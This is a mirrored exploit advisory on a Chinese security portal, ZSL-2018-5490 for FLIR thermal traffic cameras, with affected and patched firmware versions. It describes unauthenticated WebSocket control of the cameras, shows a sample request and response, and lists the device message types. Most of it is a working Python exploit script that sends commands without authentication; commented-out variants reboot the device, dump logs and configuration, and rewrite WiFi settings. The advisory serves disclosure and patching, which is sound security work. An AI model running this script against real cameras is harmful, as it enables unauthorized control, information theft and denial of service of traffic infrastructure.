首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure
来源:https://www.zeroscience.mk 作者:LiquidWorm 发布时间:2018-10-09  
# Title: FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-06
# Vendor: FLIR Systems, Inc.
# Link: https://www.flir.com
# Tested on: nginx/1.12.1, nginx/1.10.2, nginx/1.8.0, Websocket/13 (RFC 6455)
# Affected firmware version: V1.01-0bb5b27 (TrafiOne)     Codename: TrafiOne
#                            E1.00.09      (TI BPL2 EDGE) Codename: TIIP4EDGE
#                            V1.02.P01     (TI x-stream)  Codename: TIIP2
#                            V1.05.P01     (ThermiCam)    Codename: ThermiCam
#                            V1.04.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.04         (ThermiCam)    Codename: ThermiCam
#                            V1.01.P02     (ThermiCam)    Codename: ThermiCam
#                            V1.05.P03     (TrafiSense)   Codename: TrafiSense
#                            V1.06         (VIP-IP)       Codename: VIP-IP
#                            V1.02.P02     (TrafiRadar)   Codename: TrafiRadar
#
# Vendor patched firmware version:
#
# Product name                Firmware      Released
# ----------------------------------------------------
# ThermiCam / TrafiSense      E1.06.03      17.09.2018
# TI BPL2 EDGE                V1.00         17.09.2018
# TI x-stream                 E1.03.02      17.09.2018
# TrafiOne                    E1.02.02      17.09.2018
# ----------------------------------------------------
#
# Advisory ID: ZSL-2018-5490
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php
# Vendor firmware updates: https://www.flir.com/security/best-practices-for-cybersecurity/
# Vendor cyber hardening guide: https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf
 
# Desc: FLIR thermal traffic cameras suffer from an unauthenticated device manipulation
# vulnerability utilizing the websocket protocol. The affected FLIR Intelligent
# Transportation Systems - ITS models use an insecure implementation of websocket
# communication used for administering the device. Authentication and authorization
# bypass via referencing a direct object allows an attacker to directly modify running
# configurations, disclose information or initiate a denial of service (DoS) scenario
# with Reboot command. The devices do not support the usage of TLS 'wss://' prefix for
# WebSocket Secure connection making the network traffic disclosed in plain-text to
# MitM evil-doers. Also, the web service has an Origin validation security issue and
# is vulnerable to Cross-Site WebSocket Hijacking (CSWSH).
#
# ---
# Request:
#
# GET ws://192.168.1.1:13042/ws/xml2 HTTP/1.1
# Host: 192.168.1.1:13042
# Connection: Upgrade
# Pragma: no-cache
# Cache-Control: no-cache
# User-Agent: Bond/00.7
# Upgrade: websocket
# Origin: zeroscience.mk:1337
# Sec-WebSocket-Version: 13
# Accept-Encoding: gzip, deflate
# Accept-Language: en-US,en;q=0.9
# Cookie: tmhDynamicLocale.locale=%22en%22
# Sec-WebSocket-Key: A5SH9PRtc3rYF49kKO4vmw==
# Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
#
# Response:
#
# HTTP/1.1 101 Switching Protocols
# Server: nginx/1.10.2
# Date: Mon, 13 Aug 2018 02:48:46 GMT
# Content-Length: 0
# Connection: upgrade
# Upgrade: WebSocket
# Sec-WebSocket-Accept: QyXaTdjpCsAyxhVnVqjMg95jepk=
#
# ---
# No HTTP/1.1 401 Unauthorized response observed.
#
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
from websocket import create_connection as t00t
import time
import sys
 
endpoint = "/ws/xml2"
 
if (len(sys.argv) <= 2):
    print '[*] Usage: exploit.py <ipaddress> <port>'
    exit(0)
 
host = sys.argv[1]
port = sys.argv[2]
 
# Supported message types:
'''
<Message Type="SupportedMessages">
<Body>
    <Message Type="GetMessageConstraints"/>
    <Message Type="GetSupportedMessages"/>
    <Message Type="Session"/>
    <Message Type="Subscription"/>
    <Message Type="ClearData"/>
    <Message Type="GetConnectionInformation"/>
    <Message Type="GetData"/>
    <Message Type="GetEvents"/>
    <Message Type="GetLostData"/>
    <Message Type="GetManagedBy"/>
    <Message Type="GetPresenceData"/>
    <Message Type="GetPresenceLevel"/>
    <Message Type="GetPresenceLevelHistory"/>
    <Message Type="GetStorageLimits"/>
    <Message Type="SetConnectionSettings"/>
    <Message Type="SetManagedBy"/>
    <Message Type="ClearBootCount"/>
    <Message Type="ClearHistogram"/>
    <Message Type="ClearStoredCounter"/>
    <Message Type="ClearSystemLogs"/>
    <Message Type="CreateAviSequence"/>
    <Message Type="DoBadStuff"/> <-- ;]]
    <Message Type="ForceEvent"/>
    <Message Type="ForceKeyframe"/>
    <Message Type="GetBootCount"/>
    <Message Type="GetBplSettings"/>
    <Message Type="GetCameraConfiguration"/>
    <Message Type="GetCameraDefinitions"/>
    <Message Type="GetCameraSettings"/>
    <Message Type="GetConfiguration"/>
    <Message Type="GetConstraints"/>
    <Message Type="GetCpuStatistics"/>
    <Message Type="GetDateTime"/>
    <Message Type="GetDisplayOverlay"/>
    <Message Type="GetEventLog"/>
    <Message Type="GetEventsDescription"/>
    <Message Type="GetFrameFlow"/>
    <Message Type="GetHardwareInformation"/>
    <Message Type="GetHardwareSensors"/>
    <Message Type="GetHistogram"/>
    <Message Type="GetImage"/>
    <Message Type="GetImageSharpness"/>
    <Message Type="GetLeptonSettings"/>
    <Message Type="GetLoggingActivation"/>
    <Message Type="GetMemoryStatistics"/>
    <Message Type="GetNumberOfOutputs"/>
    <Message Type="GetOpenEvents"/>
    <Message Type="GetOutputsState"/>
    <Message Type="GetPermissions"/>
    <Message Type="GetProductInformation"/>
    <Message Type="GetSocketInformation"/>
    <Message Type="GetState"/>
    <Message Type="GetStoredCounter"/>
    <Message Type="GetSystemLogs"/>
    <Message Type="GetTemperature"/>
    <Message Type="GetThermalQualityHistogram"/>
    <Message Type="GetThermalQualityReferenceImage"/>
    <Message Type="GetThreadInformation"/>
    <Message Type="GetTime"/>
    <Message Type="GetTranslations"/>
    <Message Type="GetUpTime"/>
    <Message Type="GetVersion"/>
    <Message Type="GetVoltage"/>
    <Message Type="GetWifiInformation"/>
    <Message Type="KeepAlive"/>
    <Message Type="Notify"/>
    <Message Type="PauseDetectionFramework"/>
    <Message Type="Reboot"/>
    <Message Type="SetBplSettings"/>
    <Message Type="SetCameraConfiguration"/>
    <Message Type="SetCameraSettings"/>
    <Message Type="SetConfiguration"/>
    <Message Type="SetConstraintsFilter"/>
    <Message Type="SetDateTime"/>
    <Message Type="SetDisplayOverlay"/>
    <Message Type="SetHardwareInformation"/>
    <Message Type="SetLeptonSettings"/>
    <Message Type="SetLoggingActivation"/>
    <Message Type="SetTime"/>
    <Message Type="SetWifiInformation"/>
    <Message Type="UpdateFrameFlow"/>
</Body>
</Message>
'''
 
socket = t00t("ws://"+host+":"+port+endpoint)
 
#print 'Sending Reboot message type (DoS)...'
#msg = '<Message Type=\"Reboot\"></Message>'
#print 'Getting supported messages...'
#msg = '<Message Type=\"GetSupportedMessages\"></Message>'
#print 'Getting system logs...'
#msg = '<Message Type=\"GetSystemLogs\"></Message>'
#print 'Getting device configuration...'
#msg = '<Message Type=\"GetConfiguration\"></Message>'
#print 'Setting new Wifi information...'
#msg ='''
#<Message Type="SetWifiInformation">
#    <Body Present="0" SSID="pwned" Channel="11" Hidden="0" Mode="AccessPoint" />
#</Message>
#'''
 
msg = '<Message Type=\"GetProductInformation\"></Message>'
 
socket.send(msg)
print 'Message sent.'
print 'Receiving...'
time.sleep(2)
priem =  socket.recv()
print 'Received data: \n%s' % priem
socket.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·360 3.5.0.1033 - Sandbox Escap
·Unitrends UEB HTTP API Remote
·Zahir Enterprise Plus 6 Stack
·Navigate CMS Unauthenticated R
·Windows Net-NTLMv2 Reflection
·Easy File Sharing Web Server 7
·ISPConfig < 3.1.13 - Remote Co
·NICO-FTP 3.0.1.19 - Buffer Ove
·FTP Voyager 16.2.0 - Denial of
·H2 Database 1.4.196 - Remote C
·Zahir Enterprise Plus 6 build
·Snes9K 0.0.9z - Denial of Serv
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved